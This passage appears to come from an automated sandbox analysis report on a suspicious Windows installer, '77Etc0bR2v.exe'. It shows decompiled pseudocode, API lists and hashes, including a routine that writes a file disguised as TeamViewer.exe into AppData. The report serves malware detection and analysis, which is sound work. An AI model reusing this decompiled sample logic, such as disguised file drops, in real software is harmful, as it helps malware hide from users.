                                                                                                                        					_t18 = _t16 * _t26 +  *0x423ee0;
                                                                                                                        					while(1) {
                                                                                                                        						_t18 = _t18 + _t20;
                                                                                                                        						_t26 = _t26 - 1;
                                                                                                                        						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        						if(_t26 != 0) {
                                                                                                                        							continue;
                                                                                                                        						}
                                                                                                                        						goto L7;
                                                                                                                        					}
                                                                                                                        					 *0x423680 = _t18[1];
                                                                                                                        					 *0x423f48 = _t18[3];
                                                                                                                        					_t23 =  &(_t18[5]);
                                                                                                                        					if(_t23 != 0) {
                                                                                                                        						 *0x42367c = _t23;
                                                                                                                        						E00405AC4(_t24,  *_t18 & 0x0000ffff);
                                                                                                                        						SetWindowTextA( *0x420478, E00405B88(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
                                                                                                                        						_t11 =  *0x423ecc;
                                                                                                                        						_t27 =  *0x423ec8;
                                                                                                                        						if(_t11 == 0) {
                                                                                                                        							L15:
                                                                                                                        							return _t11;
                                                                                                                        						}
                                                                                                                        						_t25 = _t11;
                                                                                                                        						do {
                                                                                                                        							_t11 =  *_t27;
                                                                                                                        							if(_t11 != 0) {
                                                                                                                        								_t11 = E00405B88(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                                                                                                        							}
                                                                                                                        							_t27 = _t27 + 0x418;
                                                                                                                        							_t25 = _t25 - 1;
                                                                                                                        						} while (_t25 != 0);
                                                                                                                        						goto L15;
                                                                                                                        					}
                                                                                                                        					L7:
                                                                                                                        					if(_t13 != 0xffff) {
                                                                                                                        						_t13 = 0;
                                                                                                                        					} else {
                                                                                                                        						_t13 = 0x3ff;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}

















                                                                                                                        APIs
                                                                                                                        • SetWindowTextA.USER32(00000000,004236A0), ref: 00403A10
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: TextWindow
                                                                                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 530164218-3512041753
                                                                                                                        • Opcode ID: 3de9c273dcbb814963b36f795d2ecfd45048fc62fbd5e49154c857ec1ced3a84
                                                                                                                        • Instruction ID: 09623374405f0611f065d620c03919b516a5f167df25bc0d5edc66fe9dc562c0
                                                                                                                        • Opcode Fuzzy Hash: 3de9c273dcbb814963b36f795d2ecfd45048fc62fbd5e49154c857ec1ced3a84
                                                                                                                        • Instruction Fuzzy Hash: F611C2B1B005109BC730DF15D880A73767DEB84716369413BE94167391C77EAE028E58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00404E54(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                        				long _t22;
                                                                                                                        
                                                                                                                        				if(_a8 != 0x102) {
                                                                                                                        					if(_a8 != 0x200) {
                                                                                                                        						_t22 = _a16;
                                                                                                                        						L7:
                                                                                                                        						if(_a8 == 0x419 &&  *0x420488 != _t22) {
                                                                                                                        							 *0x420488 = _t22;
                                                                                                                        							E00405B66(0x4204a0, 0x424000);
                                                                                                                        							E00405AC4(0x424000, _t22);
                                                                                                                        							E0040140B(6);
                                                                                                                        							E00405B66(0x424000, 0x4204a0);
                                                                                                                        						}
                                                                                                                        						L11:
                                                                                                                        						return CallWindowProcA( *0x420490, _a4, _a8, _a12, _t22);
                                                                                                                        					}
                                                                                                                        					if(IsWindowVisible(_a4) == 0) {
                                                                                                                        						L10:
                                                                                                                        						_t22 = _a16;
                                                                                                                        						goto L11;
                                                                                                                        					}
                                                                                                                        					_t22 = E004047D3(_a4, 1);
                                                                                                                        					_a8 = 0x419;
                                                                                                                        					goto L7;
                                                                                                                        				}
                                                                                                                        				if(_a12 != 0x20) {
                                                                                                                        					goto L10;
                                                                                                                        				}
                                                                                                                        				E00403F64(0x413);
                                                                                                                        				return 0;
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00404E8A
                                                                                                                        • CallWindowProcA.USER32 ref: 00404EF8
                                                                                                                          • Part of subcall function 00403F64: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403F76
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                        • Opcode ID: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                                        • Instruction ID: 62f3a1a08e098275047049d4f9968a6b4933f6b7f921e7009373277d82a30415
                                                                                                                        • Opcode Fuzzy Hash: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                                        • Instruction Fuzzy Hash: D1116D71900208BBDB21AF52DC4499B3669FB84369F00803BF6047A2E2C37C5A519BAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 92%
                                                                                                                        			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                                                                        				int _t5;
                                                                                                                        				long _t6;
                                                                                                                        				struct _OVERLAPPED* _t10;
                                                                                                                        				intOrPtr* _t14;
                                                                                                                        				void* _t16;
                                                                                                                        				int _t20;
                                                                                                                        
                                                                                                                        				_t14 = __esi;
                                                                                                                        				_t10 = __ebx;
                                                                                                                        				if( *((intOrPtr*)(_t16 - 0x1c)) == __ebx) {
                                                                                                                        					_t6 = E004029F6(0x11);
                                                                                                                        					_push(_t6);
                                                                                                                        					L00405B7C();
                                                                                                                        				} else {
                                                                                                                        					E004029D9(1);
                                                                                                                        					 *0x409f70 = __al;
                                                                                                                        				}
                                                                                                                        				if( *_t14 == _t10) {
                                                                                                                        					L8:
                                                                                                                        					 *((intOrPtr*)(_t16 - 4)) = 1;
                                                                                                                        				} else {
                                                                                                                        					_t5 = WriteFile(E00405ADD(_t16 + 8, _t14), " "C:\Users\engineer\AppData\Roaming\TeamViewer\TeamViewer.exe"", _t6, _t16 + 8, _t10);
                                                                                                                        					_t20 = _t5;
                                                                                                                        					if(_t20 == 0) {
                                                                                                                        						goto L8;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t16 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}










                                                                                                                        APIs
                                                                                                                        • lstrlen.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                                                        • WriteFile.KERNEL32(00000000,?, "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe",00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                                                        Strings
                                                                                                                        • "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe", xrefs: 004024CA, 004024EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWritelstrlen
                                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"
                                                                                                                        • API String ID: 427699356-1099692596
                                                                                                                        • Opcode ID: b17d70d1d37ace8b3219b3e25872661ee24ef85dcd84733a3d500bda6f130cd4
                                                                                                                        • Instruction ID: 2c1f07a632d72534084a5ac00d75746702f795d1104bf50e8da4b719a2e94720
                                                                                                                        • Opcode Fuzzy Hash: b17d70d1d37ace8b3219b3e25872661ee24ef85dcd84733a3d500bda6f130cd4
                                                                                                                        • Instruction Fuzzy Hash: BCF08972A44245FFD710EBB19E49EAF7668DB00348F14443BB142F51C2D6FC5982976D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0040361A() {
                                                                                                                        				void* _t2;
                                                                                                                        				void* _t3;
                                                                                                                        				void* _t6;
                                                                                                                        				void* _t8;
                                                                                                                        
                                                                                                                        				_t8 =  *0x41f45c;
                                                                                                                        				_t3 = E004035FF(_t2, 0);
                                                                                                                        				if(_t8 != 0) {
                                                                                                                        					do {
                                                                                                                        						_t6 = _t8;
                                                                                                                        						_t8 =  *_t8;
                                                                                                                        						FreeLibrary( *(_t6 + 8));
                                                                                                                        						_t3 = GlobalFree(_t6);
                                                                                                                        					} while (_t8 != 0);
                                                                                                                        				}
                                                                                                                        				 *0x41f45c =  *0x41f45c & 0x00000000;
                                                                                                                        				return _t3;
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,00000000,747DF560,004035F1,00000000,0040342D,00000000), ref: 00403634
                                                                                                                        • GlobalFree.KERNEL32 ref: 0040363B
                                                                                                                        Strings
                                                                                                                        • "C:\Users\user\Desktop\77Etc0bR2v.exe" , xrefs: 0040362C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$GlobalLibrary
                                                                                                                        • String ID: "C:\Users\user\Desktop\77Etc0bR2v.exe"
                                                                                                                        • API String ID: 1100898210-1136564451
                                                                                                                        • Opcode ID: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                                                        • Instruction ID: 07f203a12dc211ea1540440f4769086933c1ddaa55d0411da1bb29b7fd771b51
                                                                                                                        • Opcode Fuzzy Hash: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                                                        • Instruction Fuzzy Hash: 8FE08C32804420ABC6216F55EC0579A7768AB48B22F028536E900BB3A083743C464BDC
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 88%
                                                                                                                        			E004056A0(void* __eax, char* _a4) {
                                                                                                                        				char* _t3;
                                                                                                                        				char* _t5;
                                                                                                                        
                                                                                                                        				_t5 = _a4;
                                                                                                                        				_push(_t5);
                                                                                                                        				L00405B7C();
                                                                                                                        				_t3 = __eax + _t5;
                                                                                                                        				while( *_t3 != 0x5c) {
                                                                                                                        					_t3 = CharPrevA(_t5, _t3);
                                                                                                                        					if(_t3 > _t5) {
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					break;
                                                                                                                        				}
                                                                                                                        				 *_t3 =  *_t3 & 0x00000000;
                                                                                                                        				return  &(_t3[1]);
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • lstrlen.KERNEL32(80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\77Etc0bR2v.exe,C:\Users\user\Desktop\77Etc0bR2v.exe,80000000,00000003), ref: 004056A6
                                                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\77Etc0bR2v.exe,C:\Users\user\Desktop\77Etc0bR2v.exe,80000000,00000003), ref: 004056B4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrlen
                                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                                        • API String ID: 2709904686-3125694417
                                                                                                                        • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                        • Instruction ID: 6658d1b0ab05e5211e75f0b74aef41c49d7b43cb9628f8e009f88ad9fa15a52a
                                                                                                                        • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                        • Instruction Fuzzy Hash: C5D0A772409DB02EF30352108C04B8F7A98CF17300F0948A2E440E21D0C27C5C818FFD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 54%
                                                                                                                        			E004057B2(CHAR* __eax, intOrPtr _a8) {
                                                                                                                        				CHAR* _v0;
                                                                                                                        				CHAR* _t8;
                                                                                                                        				void* _t9;
                                                                                                                        				CHAR* _t13;
                                                                                                                        				CHAR* _t14;
                                                                                                                        
                                                                                                                        				_t8 = __eax;
                                                                                                                        				_push(_a8);
                                                                                                                        				L00405B7C();
                                                                                                                        				_t13 = __eax;
                                                                                                                        				_t14 = _v0;
                                                                                                                        				while(1) {
                                                                                                                        					_push(_t14);
                                                                                                                        					L00405B7C();
                                                                                                                        					if(_t8 < _t13) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					 *(_t13 + _t14) =  *(_t13 + _t14) & 0x00000000;
                                                                                                                        					_t9 =  *0x4070f0(_t14, _v0);
                                                                                                                        					if(_t9 == 0) {
                                                                                                                        						return _t14;
                                                                                                                        					}
                                                                                                                        					_t8 = CharNextA(_t14);
                                                                                                                        					_t14 = _t8;
                                                                                                                        				}
                                                                                                                        				return 0;
                                                                                                                        			}









                                                                                                                        APIs
                                                                                                                        • lstrlen.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                                        • lstrcmpi.KERNEL32 ref: 004057D2
                                                                                                                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004057E0
                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190613189-0
                                                                                                                        • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                                        • Instruction ID: 042c172281cf084eebf1820456e7eb749b121a10276c912c68532230cfd8689c
                                                                                                                        • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                                        • Instruction Fuzzy Hash: BBF0A736249D51DBC2029B295C44E6FBEA4EF95355F14057EF440F3180D335AC11ABBB
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Executed Functions

                                                                                                                        C-Code - Quality: 94%
                                                                                                                        			E6F338510(struct HINSTANCE__* _a4, intOrPtr _a8) {
                                                                                                                        				char _v268;
                                                                                                                        				char _v276;
                                                                                                                        				char _v284;
                                                                                                                        				char _v292;
                                                                                                                        				char _v524;
                                                                                                                        				char _v532;
                                                                                                                        				char _v540;
                                                                                                                        				char _v544;
                                                                                                                        				char _v548;
                                                                                                                        				char _v552;
                                                                                                                        				char _v556;
                                                                                                                        				char _v560;
                                                                                                                        				char _v568;
                                                                                                                        				char _v576;
                                                                                                                        				char _v584;
                                                                                                                        				int _v588;
                                                                                                                        				char _v592;
                                                                                                                        				intOrPtr _v596;
                                                                                                                        				intOrPtr _v600;
                                                                                                                        				int _v604;
                                                                                                                        				char* _v608;
                                                                                                                        				intOrPtr _v612;
                                                                                                                        				intOrPtr _v616;
                                                                                                                        				int _v620;
                                                                                                                        				char* _v624;
                                                                                                                        				intOrPtr _v628;
                                                                                                                        				intOrPtr _v632;
                                                                                                                        				int _v636;
                                                                                                                        				char* _v640;
                                                                                                                        				intOrPtr _v644;
                                                                                                                        				intOrPtr _v648;
                                                                                                                        				int _v652;
                                                                                                                        				char* _v656;
                                                                                                                        				intOrPtr _v660;
                                                                                                                        				intOrPtr _v664;
                                                                                                                        				int _v668;
                                                                                                                        				char* _v672;
                                                                                                                        				intOrPtr _v676;
                                                                                                                        				intOrPtr _v680;
                                                                                                                        				int _v684;
                                                                                                                        				char* _v688;
                                                                                                                        				intOrPtr _v692;
                                                                                                                        				intOrPtr _v696;
                                                                                                                        				int _v700;
                                                                                                                        				char* _v704;
                                                                                                                        				intOrPtr _v708;
                                                                                                                        				intOrPtr _v712;
                                                                                                                        				int _v716;
                                                                                                                        				char* _v720;
                                                                                                                        				intOrPtr _v724;
                                                                                                                        				intOrPtr _v728;
                                                                                                                        				int _v732;
                                                                                                                        				char* _v736;
                                                                                                                        				intOrPtr _v740;
                                                                                                                        				intOrPtr _v744;
                                                                                                                        				int _v748;
                                                                                                                        				char* _v752;
                                                                                                                        				intOrPtr _v756;
                                                                                                                        				intOrPtr _v760;
                                                                                                                        				int _v764;
                                                                                                                        				char* _v768;
                                                                                                                        				intOrPtr _v772;
                                                                                                                        				intOrPtr _v776;
                                                                                                                        				int _v780;
                                                                                                                        				char* _v784;
                                                                                                                        				intOrPtr _v788;
                                                                                                                        				intOrPtr _v792;
                                                                                                                        				int _v796;
                                                                                                                        				char* _v800;
                                                                                                                        				intOrPtr _v804;
                                                                                                                        				intOrPtr _v808;
                                                                                                                        				int _v812;
                                                                                                                        				char* _v816;
                                                                                                                        				intOrPtr _v820;
                                                                                                                        				intOrPtr _v824;
                                                                                                                        				int _v828;
                                                                                                                        				char* _v832;
                                                                                                                        				short _v836;
                                                                                                                        				intOrPtr _v840;
                                                                                                                        				long _v844;
                                                                                                                        				char* _v848;
                                                                                                                        				char _v852;
                                                                                                                        				long _v856;
                                                                                                                        				void _v860;
                                                                                                                        				char _v868;
                                                                                                                        				long _v872;
                                                                                                                        				intOrPtr _v888;
                                                                                                                        				int _v908;
                                                                                                                        				char* _v912;
                                                                                                                        				intOrPtr _v916;
                                                                                                                        				intOrPtr _v920;
                                                                                                                        				int _v924;
                                                                                                                        				char* _v928;
                                                                                                                        				void* _v932;
                                                                                                                        				char _v936;
                                                                                                                        				char _v937;
                                                                                                                        				char _v938;
                                                                                                                        				short _v939;
                                                                                                                        				void* _v940;
                                                                                                                        				char _v944;
                                                                                                                        				char _v945;
                                                                                                                        				short _v947;
                                                                                                                        				void* _v948;
                                                                                                                        				char _v952;
                                                                                                                        				void* _v956;
                                                                                                                        				char _v960;
                                                                                                                        				short _v962;
                                                                                                                        				short _v964;
                                                                                                                        				short _v966;
                                                                                                                        				char _v968;
                                                                                                                        				short _v970;
                                                                                                                        				char _v972;
                                                                                                                        				short _v974;
                                                                                                                        				short _v976;
                                                                                                                        				int _v980;
                                                                                                                        				signed int _v984;
                                                                                                                        				signed int _v992;
                                                                                                                        				intOrPtr _t262;
                                                                                                                        				void* _t263;
                                                                                                                        				void* _t264;
                                                                                                                        				void* _t265;
                                                                                                                        				void* _t266;
                                                                                                                        				void* _t267;
                                                                                                                        				void* _t268;
                                                                                                                        				void* _t269;
                                                                                                                        				void* _t270;
                                                                                                                        				void* _t271;
                                                                                                                        				void* _t272;
                                                                                                                        				void* _t273;
                                                                                                                        				void* _t274;
                                                                                                                        				void* _t275;
                                                                                                                        				struct HINSTANCE__* _t277;
                                                                                                                        				struct HINSTANCE__* _t278;
                                                                                                                        				struct HINSTANCE__* _t279;
                                                                                                                        				struct HINSTANCE__* _t280;
                                                                                                                        				struct HINSTANCE__* _t281;
                                                                                                                        				struct HINSTANCE__* _t282;
                                                                                                                        				struct HINSTANCE__* _t283;
                                                                                                                        				void* _t284;
                                                                                                                        				void* _t285;
                                                                                                                        				void* _t286;
                                                                                                                        				void* _t287;
                                                                                                                        				void* _t288;
                                                                                                                        				void* _t289;
                                                                                                                        				void* _t290;
                                                                                                                        				CHAR* _t343;
                                                                                                                        				CHAR* _t347;
                                                                                                                        				void* _t350;
                                                                                                                        				void* _t351;
                                                                                                                        				void* _t352;
                                                                                                                        				CHAR* _t355;
                                                                                                                        				void* _t357;
                                                                                                                        				CHAR* _t359;
                                                                                                                        				long _t360;
                                                                                                                        				char* _t362;
                                                                                                                        				void* _t363;
                                                                                                                        				intOrPtr _t365;
                                                                                                                        				char _t366;
                                                                                                                        				WCHAR* _t369;
                                                                                                                        				void* _t371;
                                                                                                                        				CHAR* _t373;
                                                                                                                        				intOrPtr _t375;
                                                                                                                        				CHAR* _t390;
                                                                                                                        				CHAR* _t400;
                                                                                                                        				void* _t403;
                                                                                                                        				signed int _t404;
                                                                                                                        				int _t407;
                                                                                                                        				char _t408;
                                                                                                                        				struct HINSTANCE__* _t410;
                                                                                                                        				intOrPtr _t413;
                                                                                                                        				void* _t415;
                                                                                                                        				struct HINSTANCE__* _t420;
                                                                                                                        				long _t423;
                                                                                                                        				void* _t424;
                                                                                                                        				struct HINSTANCE__* _t427;
                                                                                                                        				void* _t428;
                                                                                                                        				struct HINSTANCE__* _t431;
                                                                                                                        				void* _t432;
                                                                                                                        				char _t433;
                                                                                                                        				struct HINSTANCE__* _t435;
                                                                                                                        				void* _t436;
                                                                                                                        				char _t437;
                                                                                                                        				struct HINSTANCE__* _t439;
                                                                                                                        				void* _t441;
                                                                                                                        				struct HINSTANCE__* _t446;
                                                                                                                        				void* _t447;
                                                                                                                        				struct HINSTANCE__* _t450;
                                                                                                                        				intOrPtr _t451;
                                                                                                                        				intOrPtr _t463;
                                                                                                                        				char* _t464;
                                                                                                                        				struct HWND__* _t466;
                                                                                                                        				struct HWND__* _t468;
                                                                                                                        				char _t470;
                                                                                                                        				intOrPtr* _t476;
                                                                                                                        				char* _t477;
                                                                                                                        				int _t478;
                                                                                                                        				void* _t480;
                                                                                                                        				void* _t481;
                                                                                                                        				int _t483;
                                                                                                                        				short* _t484;
                                                                                                                        				long _t489;
                                                                                                                        				long _t493;
                                                                                                                        				char* _t502;
                                                                                                                        				int _t503;
                                                                                                                        				char* _t504;
                                                                                                                        				char _t505;
                                                                                                                        				WCHAR* _t507;
                                                                                                                        				void* _t509;
                                                                                                                        				CHAR* _t511;
                                                                                                                        				char _t512;
                                                                                                                        				char _t514;
                                                                                                                        				char _t515;
                                                                                                                        				char _t531;
                                                                                                                        				void* _t541;
                                                                                                                        				void* _t543;
                                                                                                                        				char* _t544;
                                                                                                                        				char* _t546;
                                                                                                                        				char _t548;
                                                                                                                        				void* _t549;
                                                                                                                        				CHAR* _t552;
                                                                                                                        				CHAR* _t553;
                                                                                                                        				char _t560;
                                                                                                                        				char _t561;
                                                                                                                        				intOrPtr _t568;
                                                                                                                        				intOrPtr _t575;
                                                                                                                        				void* _t576;
                                                                                                                        				void* _t589;
                                                                                                                        				signed int _t591;
                                                                                                                        				void* _t592;
                                                                                                                        				signed int _t596;
                                                                                                                        				void** _t598;
                                                                                                                        				intOrPtr* _t601;
                                                                                                                        				void* _t605;
                                                                                                                        				struct HINSTANCE__* _t606;
                                                                                                                        				void* _t611;
                                                                                                                        				void* _t613;
                                                                                                                        				void* _t618;
                                                                                                                        				void* _t621;
                                                                                                                        				void* _t622;
                                                                                                                        				void* _t623;
                                                                                                                        				void* _t624;
                                                                                                                        				void* _t625;
                                                                                                                        				void* _t626;
                                                                                                                        				void* _t627;
                                                                                                                        				void* _t628;
                                                                                                                        				void* _t632;
                                                                                                                        				void* _t633;
                                                                                                                        
                                                                                                                        				_t262 = _a8;
                                                                                                                        				if(_t262 == 0) {
                                                                                                                        					_t263 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
                                                                                                                        					__eflags = _t263;
                                                                                                                        					if(_t263 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t263);
                                                                                                                        					}
                                                                                                                        					_t264 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        					__eflags = _t264;
                                                                                                                        					if(_t264 != 0) {
